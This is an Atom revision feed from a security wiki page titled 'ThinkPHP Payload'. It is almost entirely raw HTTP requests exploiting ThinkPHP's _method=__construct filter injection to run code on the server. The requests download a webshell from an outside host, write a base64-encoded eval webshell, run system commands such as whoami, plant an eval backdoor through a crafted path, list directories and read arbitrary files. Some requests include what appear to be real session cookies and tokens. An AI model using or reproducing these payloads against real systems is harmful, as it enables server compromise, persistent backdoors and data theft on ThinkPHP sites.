<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=ThinkPHP_Payload</id>
	<title>ThinkPHP Payload - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=ThinkPHP_Payload"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=ThinkPHP_Payload&amp;action=history"/>
	<updated>2026-04-16T03:19:54Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=ThinkPHP_Payload&amp;diff=1658&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; POST /index.php?s=captcha&amp;&amp;Fuck=copy(%22http://www.o2oxy.cn/webshell/ali.txt%22,%22test.php%22) HTTP/1.1 Host: aaa.kkt99.top Content-Length: 76 Cache-Control: max-age=0...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=ThinkPHP_Payload&amp;diff=1658&amp;oldid=prev"/>
		<updated>2021-04-14T08:26:11Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; POST /index.php?s=captcha&amp;amp;&amp;amp;Fuck=copy(%22http://www.o2oxy.cn/webshell/ali.txt%22,%22test.php%22) HTTP/1.1 Host: aaa.kkt99.top Content-Length: 76 Cache-Control: max-age=0...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /index.php?s=captcha&amp;amp;&amp;amp;Fuck=copy(%22http://www.o2oxy.cn/webshell/ali.txt%22,%22test.php%22) HTTP/1.1&lt;br /&gt;
Host: aaa.kkt99.top&lt;br /&gt;
Content-Length: 76&lt;br /&gt;
Cache-Control: max-age=0&lt;br /&gt;
Origin: null&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8&lt;br /&gt;
Cookie: PHPSESSID=15c58ldpm65a12094fik2aul60; UM_distinctid=16ec5c84963499-0179aed780904e-2393f61-384000-16ec5c8496494d; CNZZDATA1271205468=1873186741-1575275639-%7C1575275639&lt;br /&gt;
Connection: close&lt;br /&gt;
&lt;br /&gt;
_method=__construct&amp;amp;filter=assert&amp;amp;method=GET&amp;amp;server%5BREQUEST_METHOD%5D=Fuck&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
_method=construct&amp;amp;filter[]=assert&amp;amp;filter[]=file_put_contents('0.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWyczNjB2ZXJ5J107ZXZhbCgkcGFzcyk7Pz4='))&amp;amp;server=-1&lt;br /&gt;
&lt;br /&gt;
_method=__construct&amp;amp;filter[]=system&amp;amp;method=GET&amp;amp;get[]=whoami&lt;br /&gt;
&lt;br /&gt;
_method=__construct&amp;amp;filter[]=assert&amp;amp;server[]=phpinfo&amp;amp;get[]=phpinfo &lt;br /&gt;
or&lt;br /&gt;
_method=__construct&amp;amp;filter[]=call_user_func&amp;amp;server[]=phpinfo&amp;amp;get[]=phpinfo&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
PHP 7.4 Getshell:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /%3f&amp;gt;&amp;lt;%3fphp%20eval($_GET[1]);%3f&amp;gt;/controller/Index.php?1=phpinfo(); HTTP/1.1&lt;br /&gt;
Host: 192.168.0.103:8181&lt;br /&gt;
Cache-Control: max-age=0&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8&lt;br /&gt;
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Content-Length: 123&lt;br /&gt;
&lt;br /&gt;
_method=__construct&amp;amp;method=GET&amp;amp;server[]=1&amp;amp;filter[]=think\Build::module&amp;amp;get[]=index//../../public//?&amp;gt;&amp;lt;?php eval($_GET[1]);?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
列舉目標:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /index.php?s=captcha&amp;amp;&amp;amp;Fuck=12312 HTTP/1.1&lt;br /&gt;
Host: 192.168.0.103:8181&lt;br /&gt;
Cache-Control: max-age=0&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8&lt;br /&gt;
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Content-Length: 102&lt;br /&gt;
&lt;br /&gt;
_method=__construct&amp;amp;filter[]=scandir&amp;amp;filter[]=var_dump&amp;amp;method=GET&amp;amp;get[]=/www/wwwroot/adada.com/public/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
PHP7.4任意文件讀取:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /index.php?s=captcha&amp;amp;&amp;amp;Fuck=12312 HTTP/1.1&lt;br /&gt;
Host: 192.168.0.103:8181&lt;br /&gt;
Cache-Control: max-age=0&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8&lt;br /&gt;
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Content-Length: 100&lt;br /&gt;
&lt;br /&gt;
_method=__construct&amp;amp;filter[]=highlight_file&amp;amp;method=GET&amp;amp;get[]=/www/wwwroot/adada.com/public/index.php&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>